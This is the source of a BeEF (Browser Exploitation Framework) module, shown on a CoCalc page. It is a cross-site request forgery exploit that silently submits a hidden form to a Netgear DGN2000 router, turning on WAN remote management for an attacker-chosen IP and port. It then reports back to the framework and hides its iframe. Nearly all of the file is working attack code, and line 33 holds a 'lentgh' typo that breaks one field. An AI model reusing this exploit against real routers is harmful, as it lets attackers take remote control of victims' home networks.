CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
	var base = '<%= @base %>';
9
	var sourceip = '<%= @sourceip %>';
10
  var port = '<%= @port %>';
11
  var acl = sourceip != '0.0.0.0' ? 'ip_address_list1' : 'all';
12
  var parts = [];
13
  if (sourceip != '0.0.0.0'){
14
    parts = sourceip.split('.');
15
  }
16

17
	var netgear_iframe = beef.dom.createIframeXsrfForm(base, 'POST', 'application/x-www-form-urlencoded', [
18
    { type: 'hidden', name: 'remote_mg', value: 'remote_mg' },
19
    { type: 'hidden', name: 'rm_ip1', value: '' },
20
    { type: 'hidden', name: 'rm_ip2', value: '' },
21
    { type: 'hidden', name: 'rm_ip3', value: '' },
22
    { type: 'hidden', name: 'rm_ip4', value: '' },
23
    { type: 'hidden', name: 'rm_start_ip1', value: '' },
24
    { type: 'hidden', name: 'rm_start_ip2', value: '' },
25
    { type: 'hidden', name: 'rm_start_ip3', value: '' },
26
    { type: 'hidden', name: 'rm_start_ip4', value: '' },
27
    { type: 'hidden', name: 'rm_finish_ip1', value: '' },
28
    { type: 'hidden', name: 'rm_finish_ip2', value: '' },
29
    { type: 'hidden', name: 'rm_finish_ip3', value: '' },
30
    { type: 'hidden', name: 'rm_finish_ip4', value: '' },
31
    { type: 'hidden', name: 'rm_list1_ip1_ip1', value: parts.length === 4 ? parts[0] : '' },
32
    { type: 'hidden', name: 'rm_list1_ip1_ip2', value: parts.length === 4 ? parts[1] : '' },
33
    { type: 'hidden', name: 'rm_list1_ip1_ip3', value: parts.lentgh === 4 ? parts[2] : '' },
34
    { type: 'hidden', name: 'rm_list1_ip1_ip4', value: parts.length === 4 ? parts[3] : '' },
35
    { type: 'hidden', name: 'rm_list1_ip2_ip1', value: '' },
36
    { type: 'hidden', name: 'rm_list1_ip2_ip2', value: '' },
37
    { type: 'hidden', name: 'rm_list1_ip2_ip3', value: '' },
38
    { type: 'hidden', name: 'rm_list1_ip2_ip4', value: '' },
39
    { type: 'hidden', name: 'rm_list1_ip3_ip1', value: '' },
40
    { type: 'hidden', name: 'rm_list1_ip3_ip2', value: '' },
41
    { type: 'hidden', name: 'rm_list1_ip3_ip3', value: '' },
42
    { type: 'hidden', name: 'rm_list1_ip3_ip4', value: '' },
43
    { type: 'hidden', name: 'rm_list1_ip4_ip1', value: '' },
44
    { type: 'hidden', name: 'rm_list1_ip4_ip2', value: '' },
45
    { type: 'hidden', name: 'rm_list1_ip4_ip3', value: '' },
46
    { type: 'hidden', name: 'rm_list1_ip4_ip4', value: '' },
47
    { type: 'hidden', name: 'rm_list1_ip5_ip1', value: '' },
48
    { type: 'hidden', name: 'rm_list1_ip5_ip2', value: '' },
49
    { type: 'hidden', name: 'rm_list1_ip5_ip3', value: '' },
50
    { type: 'hidden', name: 'rm_list1_ip5_ip4', value: '' },
51
    { type: 'hidden', name: 'rm_list1_ip6_ip1', value: '' },
52
    { type: 'hidden', name: 'rm_list1_ip6_ip2', value: '' },
53
    { type: 'hidden', name: 'rm_list1_ip6_ip3', value: '' },
54
    { type: 'hidden', name: 'rm_list1_ip6_ip4', value: '' },
55
    { type: 'hidden', name: 'rm_list1_ip7_ip1', value: '' },
56
    { type: 'hidden', name: 'rm_list1_ip7_ip2', value: '' },
57
    { type: 'hidden', name: 'rm_list1_ip7_ip3', value: '' },
58
    { type: 'hidden', name: 'rm_list1_ip7_ip4', value: '' },
59
    { type: 'hidden', name: 'rm_list1_ip8_ip1', value: '' },
60
    { type: 'hidden', name: 'rm_list1_ip8_ip2', value: '' },
61
    { type: 'hidden', name: 'rm_list1_ip8_ip3', value: '' },
62
    { type: 'hidden', name: 'rm_list1_ip8_ip4', value: '' },
63
    { type: 'hidden', name: 'rm_list1_ip9_ip1', value: '' },
64
    { type: 'hidden', name: 'rm_list1_ip9_ip2', value: '' },
65
    { type: 'hidden', name: 'rm_list1_ip9_ip3', value: '' },
66
    { type: 'hidden', name: 'rm_list1_ip9_ip4', value: '' },
67
    { type: 'hidden', name: 'rm_list1_ip10_ip1', value: '' },
68
    { type: 'hidden', name: 'rm_list1_ip10_ip2', value: '' },
69
    { type: 'hidden', name: 'rm_list1_ip10_ip3', value: '' },
70
    { type: 'hidden', name: 'rm_list1_ip10_ip4', value: '' },
71
    { type: 'hidden', name: 'rm_access', value: acl },
72
    { type: 'hidden', name: 'remote_port', value: port },
73
    { type: 'hidden', name: 'apply', value: 'Apply' },
74
    { type: 'hidden', name: 'todo', value: 'save' },
75
    { type: 'hidden', name: 'this_file', value: 'remotemg.htm' },
76
    { type: 'hidden', name: 'next_file', value: 'remotemg.htm' },
77
    { type: 'hidden', name: 'c4_rm_ip', value: '' },
78
    { type: 'hidden', name: 'c4_rm_start_ip', value: '' },
79
    { type: 'hidden', name: 'c4_rm_finish_ip', value: '' },
80
    { type: 'hidden', name: 'c4_rm_list1_ip1_ip', value: sourceip },
81
    { type: 'hidden', name: 'c4_rm_list1_ip2_ip', value: '' },
82
    { type: 'hidden', name: 'c4_rm_list1_ip3_ip', value: '' },
83
    { type: 'hidden', name: 'c4_rm_list1_ip4_ip', value: '' },
84
    { type: 'hidden', name: 'c4_rm_list1_ip5_ip', value: '' },
85
    { type: 'hidden', name: 'c4_rm_list1_ip6_ip', value: '' },
86
    { type: 'hidden', name: 'c4_rm_list1_ip7_ip', value: '' },
87
    { type: 'hidden', name: 'c4_rm_list1_ip8_ip', value: '' },
88
    { type: 'hidden', name: 'c4_rm_list1_ip9_ip', value: '' },
89
    { type: 'hidden', name: 'c4_rm_list1_ip10_ip', value: '' },
90
    { type: 'hidden', name: 'h_remote_mg', value: 'enable' },
91
    { type: 'hidden', name: 'h_rm_access', value: acl }
92
  ]);
93

94
	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
95

96
	cleanup = function() {
97
		document.body.removeChild(netgear_iframe);
98
	}
99

100
	setTimeout('cleanup()', 15000);
101

102
});
103

104

105
Product

Resources

Company
